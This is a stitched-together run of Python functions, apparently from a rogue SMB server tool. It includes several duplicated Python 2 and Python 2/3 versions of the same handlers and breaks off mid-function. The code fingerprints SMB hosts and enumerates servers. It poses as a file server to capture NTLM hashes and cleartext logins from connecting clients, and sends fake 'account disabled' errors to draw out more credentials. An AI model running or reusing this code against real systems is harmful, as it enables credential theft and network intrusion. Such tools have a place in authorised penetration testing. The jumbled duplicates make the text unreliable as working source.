def RunSmbFinger(host):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.settimeout(0.7)
h = SMBHeader(cmd="\x72", flag1="\x18", flag2="\x53\xc8")
n = SMBNego(data=SMBNegoFingerData())
n.calculate()
Packet = str(h) + str(n)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(2048)
if data[8:10] == "\x72\x00":
Header = SMBHeader(cmd="\x73",
flag1="\x18",
flag2="\x17\xc8",
uid="\x00\x00")
Body = SMBSessionFingerData()
Body.calculate()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(2048)
if data[8:10] == "\x73\x16":
return OsNameClientVersion(data)
except:
print color("[!] ", 1, 1) + " Fingerprint failed"
return None
def RunSmbFinger(host):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.settimeout(0.7)
h = SMBHeader(cmd='\x72', flag1='\x18', flag2='\x53\xc8')
n = SMBNego(data=str(SMBNegoFingerData()))
n.calculate()
Packet = str(h) + str(n)
Buffer1 = StructPython2or3('>i', str(Packet)) + str(Packet)
s.send(NetworkSendBufferPython2or3(Buffer1))
data = s.recv(2048)
if data[8:10] == b'\x72\x00':
Header = SMBHeader(cmd="\x73",
flag1="\x18",
flag2="\x17\xc8",
uid="\x00\x00")
Body = SMBSessionFingerData()
Body.calculate()
Packet = str(Header) + str(Body)
Buffer1 = StructPython2or3('>i', str(Packet)) + str(Packet)
s.send(NetworkSendBufferPython2or3(Buffer1))
data = s.recv(2048)
if data[8:10] == b'\x73\x16':
return OsNameClientVersion(data)
except:
print(color("[!] ", 1, 1) + " Fingerprint failed")
return None
def handle(self):
try:
self.request.settimeout(0.5)
data = self.request.recv(1024)
##session request 139
if data[0] == "\x81":
Buffer = "\x82\x00\x00\x00"
self.request.send(Buffer)
data = self.request.recv(1024)
##Negotiate proto answer.
if data[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x72",
flag1="\x80",
flag2="\x00\x00",
pid=pidcalc(data),
mid=midcalc(data))
Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),
Domain="",
Key=settings.Config.Challenge)
Body.calculate()
Packet = str(head) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##Session Setup AndX Request
if data[8:10] == "\x73\x00":
if Is_LMNT_Anonymous(data):
head = SMBHeader(cmd="\x73",
flag1="\x90",
flag2="\x53\xc8",
errorcode="\x72\x00\x00\xc0",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Packet = str(head) + str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
else:
ParseLMNTHash(data, self.client_address[0])
head = SMBHeader(cmd="\x73",
flag1="\x90",
flag2="\x53\xc8",
errorcode="\x22\x00\x00\xc0",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Packet = str(head) + str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
except Exception:
self.request.close()
pass
def handle(self):
try:
self.request.settimeout(1)
data = self.request.recv(1024)
Challenge = RandomChallenge()
if data[0] == b"\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
if data[8:10] == b"\x72\x00": #Negotiate proto answer.
head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)),Domain="",Key=NetworkRecvBufferPython2or3(Challenge))
Body.calculate()
Packet = str(head)+str(Body)
Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
if data[8:10] == b"\x73\x00": #Session Setup AndX Request
if Is_LMNT_Anonymous(data):
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
Packet = str(head)+str(SMBSessEmpty())
Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
self.request.send(NetworkSendBufferPython2or3(Buffer))
else:
ParseLMNTHash(data,self.client_address[0], Challenge)
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
Packet = str(head) + str(SMBSessEmpty())
Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
except Exception:
self.request.close()
pass
def RapFinger(Host, Domain, Type):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((Host,445))
s.settimeout(0.3)
Header = SMBHeader(cmd="\x72",mid="\x01\x00")
Body = SMBNegoData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Session Setup AndX Request, Anonymous.
if data[8:10] == "\x72\x00":
Header = SMBHeader(cmd="\x73",mid="\x02\x00")
Body = SMBSessionData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Tree Connect IPC$.
if data[8:10] == "\x73\x00":
Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34],mid="\x03\x00")
Body = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$")
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Rap ServerEnum.
if data[8:10] == "\x75\x00":
Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x04\x00")
Body = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain))
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(64736)
# Rap ServerEnum, Get answer and return what we're looking for.
if data[8:10] == "\x25\x00":
s.close()
return ParsePacket(data)
except:
pass
def run(host):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.settimeout(5)
Header = SMBHeader(Cmd="\x72", Flag1="\x18", Flag2="\x53\xc8")
Nego = SMBNego(Data=SMBNegoData())
Nego.calculate()
Packet = str(Header) + str(Nego)
Buffer = NbtLen(Packet) + Packet
s.send(Buffer)
try:
data = s.recv(1024)
if data[4:5] == "\xff":
print "This host doesn't support SMBv2"
if data[4:5] == "\xfe":
IsDCVuln(GetBootTime(data[116:124]))
except Exception:
s.close()
raise
def handle(self):
try:
self.ntry = 0
while True:
data = self.request.recv(1024)
self.request.settimeout(1)
Challenge = RandomChallenge()
if not data:
break
if data[0] == "\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
try:
self.request.send(Buffer)
data = self.request.recv(1024)
except:
raise
pass
##Negotiate proto answer SMBv2.
if data[8:10] == b"\x72\x00" and re.search(
b"SMB 2.\?\?\?", data):
head = SMB2Header(CreditCharge="\x00\x00",
Credits="\x01\x00")
t = SMB2NegoAns()
t.calculate()
packet1 = str(head) + str(t)
buffer1 = StructPython2or3('>i',
str(packet1)) + str(packet1)
self.request.send(NetworkSendBufferPython2or3(buffer1))
data = self.request.recv(1024)
## Session Setup 1 answer SMBv2.
if data[16:18] == b"\x00\x00" and data[4:5] == b"\xfe":
head = SMB2Header(
MessageId=GrabMessageID(data).decode('latin-1'),
PID="\xff\xfe\x00\x00",
CreditCharge=GrabCreditCharged(data).decode('latin-1'),
Credits=GrabCreditRequested(data).decode('latin-1'))
t = SMB2NegoAns(Dialect="\x10\x02")
t.calculate()
packet1 = str(head) + str(t)
buffer1 = StructPython2or3('>i',
str(packet1)) + str(packet1)
self.request.send(NetworkSendBufferPython2or3(buffer1))
data = self.request.recv(1024)
## Session Setup 2 answer SMBv2.
if data[16:18] == b"\x01\x00" and data[4:5] == b"\xfe":
head = SMB2Header(
Cmd="\x01\x00",
MessageId=GrabMessageID(data).decode('latin-1'),
PID="\xff\xfe\x00\x00",
CreditCharge=GrabCreditCharged(data).decode('latin-1'),
Credits=GrabCreditRequested(data).decode('latin-1'),
SessionID=GrabSessionID(data).decode('latin-1'),
NTStatus="\x16\x00\x00\xc0")
t = SMB2Session1Data(
NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(
Challenge))
t.calculate()
packet1 = str(head) + str(t)
buffer1 = StructPython2or3('>i',
str(packet1)) + str(packet1)
self.request.send(NetworkSendBufferPython2or3(buffer1))
data = self.request.recv(1024)
## Session Setup 3 answer SMBv2.
if data[16:18] == b'\x01\x00' and GrabMessageID(
data)[0:1] == b'\x02' and data[4:5] == b'\xfe':
ParseSMBHash(data, self.client_address[0], Challenge)
head = SMB2Header(
Cmd="\x01\x00",
MessageId=GrabMessageID(data).decode('latin-1'),
PID="\xff\xfe\x00\x00",
CreditCharge=GrabCreditCharged(data).decode('latin-1'),
Credits=GrabCreditRequested(data).decode('latin-1'),
NTStatus="\x22\x00\x00\xc0",
SessionID=GrabSessionID(data).decode('latin-1'))
t = SMB2Session2Data()
packet1 = str(head) + str(t)
buffer1 = StructPython2or3('>i',
str(packet1)) + str(packet1)
self.request.send(NetworkSendBufferPython2or3(buffer1))
data = self.request.recv(1024)
# Negotiate Protocol Response smbv1
if data[8:10] == b'\x72\x00' and data[
4:5] == b'\xff' and re.search(b'SMB 2.\?\?\?',
data) == None:
Header = SMBHeader(
cmd="\x72",
flag1="\x88",
flag2="\x01\xc8",
pid=pidcalc(NetworkRecvBufferPython2or3(data)),
mid=midcalc(NetworkRecvBufferPython2or3(data)))
Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(
NetworkRecvBufferPython2or3(data)))
Body.calculate()
packet1 = str(Header) + str(Body)
Buffer = StructPython2or3('>i',
str(packet1)) + str(packet1)
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
if data[8:10] == b"\x73\x00" and data[
4:5] == b"\xff": # Session Setup AndX Request smbv1
IsNT4ClearTxt(data, self.client_address[0])
# STATUS_MORE_PROCESSING_REQUIRED
Header = SMBHeader(
cmd="\x73",
flag1="\x88",
flag2="\x01\xc8",
errorcode="\x16\x00\x00\xc0",
uid=chr(randrange(256)) + chr(randrange(256)),
pid=pidcalc(NetworkRecvBufferPython2or3(data)),
tid="\x00\x00",
mid=midcalc(NetworkRecvBufferPython2or3(data)))
if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
Body = SMBSession1Data(
NTLMSSPNtServerChallenge=
NetworkRecvBufferPython2or3(Challenge),
NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH")
else:
Body = SMBSession1Data(
NTLMSSPNtServerChallenge=
NetworkRecvBufferPython2or3(Challenge))
Body.calculate()
packet1 = str(Header) + str(Body)
Buffer = StructPython2or3('>i',
str(packet1)) + str(packet1)
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
if data[8:10] == b"\x73\x00" and data[
4:5] == b"\xff": # STATUS_SUCCESS
if Is_Anonymous(data):
Header = SMBHeader(
cmd="\x73",
flag1="\x98",
flag2="\x01\xc8",
errorcode="\x72\x00\x00\xc0",
pid=pidcalc(data),
tid="\x00\x00",
uid=uidcalc(NetworkRecvBufferPython2or3(data)),
mid=midcalc(NetworkRecvBufferPython2or3(data))
) ###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
packet1 = str(Header) + str(Body)
Buffer = StructPython2or3(
'>i', str(packet1)) + str(packet1)
self.request.send(
NetworkSendBufferPython2or3(Buffer))
else:
# Parse NTLMSSP_AUTH packet
ParseSMBHash(data, self.client_address[0],
Challenge)
if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
# Send ACCOUNT_DISABLED to get multiple hashes if there are any
Header = SMBHeader(
cmd="\x73",
flag1="\x98",
flag2="\x01\xc8",
errorcode="\x72\x00\x00\xc0",
pid=pidcalc(
NetworkRecvBufferPython2or3(data)),
tid="\x00\x00",
uid=uidcalc(
NetworkRecvBufferPython2or3(data)),
mid=midcalc(
NetworkRecvBufferPython2or3(data))
) ###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
packet1 = str(Header) + str(Body)
Buffer = StructPython2or3(
'>i', str(packet1)) + str(packet1)
self.request.send(
NetworkSendBufferPython2or3(Buffer))
self.ntry += 1
continue
# Send STATUS_SUCCESS
Header = SMBHeader(
cmd="\x73",
flag1="\x98",
flag2="\x01\xc8",
errorcode="\x00\x00\x00\x00",
pid=pidcalc(NetworkRecvBufferPython2or3(data)),
tid=tidcalc(NetworkRecvBufferPython2or3(data)),
uid=uidcalc(NetworkRecvBufferPython2or3(data)),
mid=midcalc(NetworkRecvBufferPython2or3(data)))
Body = SMBSession2Accept()
Body.calculate()
packet1 = str(Header) + str(Body)
Buffer = StructPython2or3(
'>i', str(packet1)) + str(packet1)
self.request.send(
NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
if data[8:10] == b"\x75\x00" and data[
4:5] == b"\xff": # Tree Connect AndX Request
ParseShare(data)
Header = SMBHeader(
cmd="\x75",
flag1="\x88",
flag2="\x01\xc8",
errorcode="\x00\x00\x00\x00",
pid=pidcalc(NetworkRecvBufferPython2or3(data)),
tid=chr(randrange(256)) + chr(randrange(256)),
uid=uidcalc(data),
mid=midcalc(NetworkRecvBufferPython2or3(data)))
Body = SMBTreeData()
Body.calculate()
packet1 = str(Header) + str(Body)
Buffer = StructPython2or3('>i',
str(packet1)) + str(packet1)
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
except:
pass
def handle(self):
try:
self.ntry = 0
while True:
data = self.request.recv(1024)
self.request.settimeout(1)
if not data:
break
if data[0] == "\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
try:
self.request.send(Buffer)
data = self.request.recv(1024)
except:
pass
##Negotiate proto answer SMBv2.
if data[8:10] == "\x72\x00" and re.search(
"SMB 2.\?\?\?", data):
head = SMB2Header(CreditCharge="\x00\x00",
Credits="\x01\x00")
t = SMB2NegoAns()
t.calculate()
packet1 = str(head) + str(t)
buffer1 = struct.pack(">i", len(
''.join(packet1))) + packet1
self.request.send(buffer1)
data = self.request.recv(1024)
## Session Setup 1 answer SMBv2.
if data[16:18] == "\x00\x00" and data[4:5] == "\xfe":
head = SMB2Header(MessageId=GrabMessageID(data),
PID="\xff\xfe\x00\x00",
CreditCharge=GrabCreditCharged(data),
Credits=GrabCreditRequested(data))
t = SMB2NegoAns(Dialect="\x10\x02")
t.calculate()
packet1 = str(head) + str(t)
buffer1 = struct.pack(">i", len(
''.join(packet1))) + packet1
self.request.send(buffer1)
data = self.request.recv(1024)
## Session Setup 2 answer SMBv2.
if data[16:18] == "\x01\x00" and data[4:5] == "\xfe":
head = SMB2Header(Cmd="\x01\x00",
MessageId=GrabMessageID(data),
PID="\xff\xfe\x00\x00",
CreditCharge=GrabCreditCharged(data),
Credits=GrabCreditRequested(data),
SessionID=GrabSessionID(data),
NTStatus="\x16\x00\x00\xc0")
t = SMB2Session1Data()
t.calculate()
packet1 = str(head) + str(t)
buffer1 = struct.pack(">i", len(
''.join(packet1))) + packet1
self.request.send(buffer1)
data = self.request.recv(1024)
## Session Setup 3 answer SMBv2.
if data[16:18] == "\x01\x00" and GrabMessageID(
data)[0:1] == "\x02" and data[4:5] == "\xfe":
ParseSMB2NTLMv2Hash(data, self.client_address[0])
head = SMB2Header(Cmd="\x01\x00",
MessageId=GrabMessageID(data),
PID="\xff\xfe\x00\x00",
CreditCharge=GrabCreditCharged(data),
Credits=GrabCreditRequested(data),
NTStatus="\x22\x00\x00\xc0",
SessionID=GrabSessionID(data))
t = SMB2Session2Data()
packet1 = str(head) + str(t)
buffer1 = struct.pack(">i", len(
''.join(packet1))) + packet1
self.request.send(buffer1)
data = self.request.recv(1024)
# Negotiate Protocol Response smbv1
if data[8:10] == "\x72\x00" and data[
4:5] == "\xff" and re.search("SMB 2.\?\?\?",
data) == None:
Header = SMBHeader(cmd="\x72",
flag1="\x88",
flag2="\x01\xc8",
pid=pidcalc(data),
mid=midcalc(data))
Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
Body.calculate()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x73\x00" and data[
4:5] == "\xff": # Session Setup AndX Request smbv1
IsNT4ClearTxt(data, self.client_address[0])
# STATUS_MORE_PROCESSING_REQUIRED
Header = SMBHeader(cmd="\x73",
flag1="\x88",
flag2="\x01\xc8",
errorcode="\x16\x00\x00\xc0",
uid=chr(randrange(256)) +
chr(randrange(256)),
pid=pidcalc(data),
tid="\x00\x00",
mid=midcalc(data))
if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
Body = SMBSession1Data(
NTLMSSPNtServerChallenge=settings.Config.Challenge,
NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH")
else:
Body = SMBSession1Data(
NTLMSSPNtServerChallenge=settings.Config.Challenge)
Body.calculate()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x73\x00" and data[
4:5] == "\xff": # STATUS_SUCCESS
if Is_Anonymous(data):
Header = SMBHeader(
cmd="\x73",
flag1="\x98",
flag2="\x01\xc8",
errorcode="\x72\x00\x00\xc0",
pid=pidcalc(data),
tid="\x00\x00",
uid=uidcalc(data),
mid=midcalc(data)
) ###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(
''.join(Packet))) + Packet
self.request.send(Buffer)
else:
# Parse NTLMSSP_AUTH packet
ParseSMBHash(data, self.client_address[0])
if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
# Send ACCOUNT_DISABLED to get multiple hashes if there are any
Header = SMBHeader(
cmd="\x73",
flag1="\x98",
flag2="\x01\xc8",
errorcode="\x72\x00\x00\xc0",
pid=pidcalc(data),
tid="\x00\x00",
uid=uidcalc(data),
mid=midcalc(data)
) ###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(
''.join(Packet))) + Packet
self.request.send(Buffer)
self.ntry += 1
continue
# Send STATUS_SUCCESS
Header = SMBHeader(cmd="\x73",
flag1="\x98",
flag2="\x01\xc8",
errorcode="\x00\x00\x00\x00",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Body = SMBSession2Accept()
Body.calculate()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(
''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x75\x00" and data[
4:5] == "\xff": # Tree Connect AndX Request
ParseShare(data)
Header = SMBHeader(cmd="\x75",
flag1="\x88",
flag2="\x01\xc8",
errorcode="\x00\x00\x00\x00",
pid=pidcalc(data),
tid=chr(randrange(256)) +
chr(randrange(256)),
uid=uidcalc(data),
mid=midcalc(data))
Body = SMBTreeData()
Body.calculate()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x71\x00" and data[
4:5] == "\xff": #Tree Disconnect
Header = SMBHeader(cmd="\x71",
flag1="\x98",
flag2="\x07\xc8",
errorcode="\x00\x00\x00\x00",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\xa2\x00" and data[
4:5] == "\xff": #NT_CREATE Access Denied.
Header = SMBHeader(cmd="\xa2",
flag1="\x98",
flag2="\x07\xc8",
errorcode="\x22\x00\x00\xc0",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x25\x00" and data[
4:5] == "\xff": # Trans2 Access Denied.
Header = SMBHeader(cmd="\x25",
flag1="\x98",
flag2="\x07\xc8",
errorcode="\x22\x00\x00\xc0",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x74\x00" and data[4:5] == "\xff": # LogOff
Header = SMBHeader(cmd="\x74",
flag1="\x98",
flag2="\x07\xc8",
errorcode="\x22\x00\x00\xc0",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Body = "\x02\xff\x00\x27\x00\x00\x00"
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
except socket.error:
pass
def handle(self):
try:
while True:
data = self.request.recv(1024)
self.request.settimeout(1)
if len(data) < 1:
break
##session request 139
if data[0] == "\x81":
Buffer = "\x82\x00\x00\x00"
try:
self.request.send(Buffer)
data = self.request.recv(1024)
except:
pass
# Negociate Protocol Response
if data[8:10] == "\x72\x00":
# \x72 == Negociate Protocol Response
Header = SMBHeader(cmd="\x72",
flag1="\x88",
flag2="\x01\xc8",
pid=pidcalc(data),
mid=midcalc(data))
Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
Body.calculate()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
# Session Setup AndX Request
if data[8:10] == "\x73\x00":
IsNT4ClearTxt(data, self.client_address[0])
# STATUS_MORE_PROCESSING_REQUIRED
Header = SMBHeader(cmd="\x73",
flag1="\x88",
flag2="\x01\xc8",
errorcode="\x16\x00\x00\xc0",
uid=chr(randrange(256)) +
chr(randrange(256)),
pid=pidcalc(data),
tid="\x00\x00",
mid=midcalc(data))
Body = SMBSession1Data(
NTLMSSPNtServerChallenge=settings.Config.Challenge)
Body.calculate()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(4096)
# STATUS_SUCCESS
if data[8:10] == "\x73\x00":
if Is_Anonymous(data):
Header = SMBHeader(
cmd="\x73",
flag1="\x98",
flag2="\x01\xc8",
errorcode="\x72\x00\x00\xc0",
pid=pidcalc(data),
tid="\x00\x00",
uid=uidcalc(data),
mid=midcalc(data)
) ###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(
''.join(Packet))) + Packet
self.request.send(Buffer)
else:
# Parse NTLMSSP_AUTH packet
ParseSMBHash(data, self.client_address[0])
# Send STATUS_SUCCESS
Header = SMBHeader(cmd="\x73",
flag1="\x98",
flag2="\x01\xc8",
errorcode="\x00\x00\x00\x00",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Body = SMBSession2Accept()
Body.calculate()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(
''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
# Tree Connect AndX Request
if data[8:10] == "\x75\x00":
ParseShare(data)
# Tree Connect AndX Response
Header = SMBHeader(cmd="\x75",
flag1="\x88",
flag2="\x01\xc8",
errorcode="\x00\x00\x00\x00",
pid=pidcalc(data),
tid=chr(randrange(256)) +
chr(randrange(256)),
uid=uidcalc(data),
mid=midcalc(data))
Body = SMBTreeData()
Body.calculate()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##Tree Disconnect.
if data[8:10] == "\x71\x00":
Header = SMBHeader(cmd="\x71",
flag1="\x98",
flag2="\x07\xc8",
errorcode="\x00\x00\x00\x00",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##NT_CREATE Access Denied.
if data[8:10] == "\xa2\x00":
Header = SMBHeader(cmd="\xa2",
flag1="\x98",
flag2="\x07\xc8",
errorcode="\x22\x00\x00\xc0",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##Trans2 Access Denied.
if data[8:10] == "\x25\x00":
Header = SMBHeader(cmd="\x25",
flag1="\x98",
flag2="\x07\xc8",
errorcode="\x22\x00\x00\xc0",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##LogOff.
if data[8:10] == "\x74\x00":
Header = SMBHeader(cmd="\x74",
flag1="\x98",
flag2="\x07\xc8",
errorcode="\x22\x00\x00\xc0",
pid=pidcalc(data),
tid=tidcalc(data),
uid=uidcalc(data),
mid=midcalc(data))
Body = "\x02\xff\x00\x27\x00\x00\x00"
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
except socket.timeout:
pass
def handle(self):
try:
self.ntry = 0
while True:
data = self.request.recv(1024)
self.request.settimeout(1)
if not data:
break
if data[0] == "\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
try:
self.request.send(Buffer)
data = self.request.recv(1024)
except:
pass
if data[8:10] == "\x72\x00": # Negociate Protocol Response
Header = SMBHeader(cmd="\x72",
flag1="\x88",
flag2="\x01\xc8",
pid=pidcalc(data),
mid=midcalc(data))
Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
Body.calculate()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
try:
data = self.request.recv(1024)
except:
pass
if data[8:10] == "\x73\x00": # Session Setup AndX Request
IsNT4ClearTxt(data, self.client_address[0])
# STATUS_MORE_PROCESSING_REQUIRED
Header = SMBHeader(cmd="\x73",
flag1="\x88",
flag2="\x01\xc8",
errorcode="\x16\x00\x00\xc0",
uid=chr(randrange(256)) +
chr(randrange(256)),
pid=pidcalc(data),
tid="\x00\x00",
mid=midcalc(data))
if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
Body = SMBSession1Data(
NTLMSSPNtServerChallenge=settings.Config.Challenge,
NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH")
else:
Body = SMBSession1Data(
NTLMSSPNtServerChallenge=settings.Config.Challenge)
Body.calculate()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(4096)
if data[8:10] == "\x73\x00": # STATUS_SUCCESS
if Is_Anonymous(data):
Header = SMBHeader(
cmd="\x73",
flag1="\x98",
flag2="\x01\xc8",
errorcode="\x72\x00\x00\xc0",
pid=pidcalc(data),
tid="\x00\x00",
uid=uidcalc(data),
mid=midcalc(data)
) ###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(
''.join(Packet))) + Packet
self.request.send(Buffer)
else:
# Parse NTLMSSP_AUTH packet
ParseSMBHash(data, self.client_address[0])
if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
# Send ACCOUNT_DISABLED to get multiple hashes if there are any
Header = SMBHeader(
cmd="\x73",
flag1="\x98",
flag2="\x01\xc8",
errorcode="\x72\x00\x00\xc0",
pid=pidcalc(data),
tid="\x00\x00",
uid=uidcalc(data),
mid=midcalc(data)
) ###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
Packet = str(Header) + str(Body)
Buffer = struct.pack(">i", len(
''.join(Packet))) + Packet
self.request.send(Buffer)
self.ntry += 1
continue
# Send STATUS_SUCCESS
Header = SMBHeader(cmd="\x73",
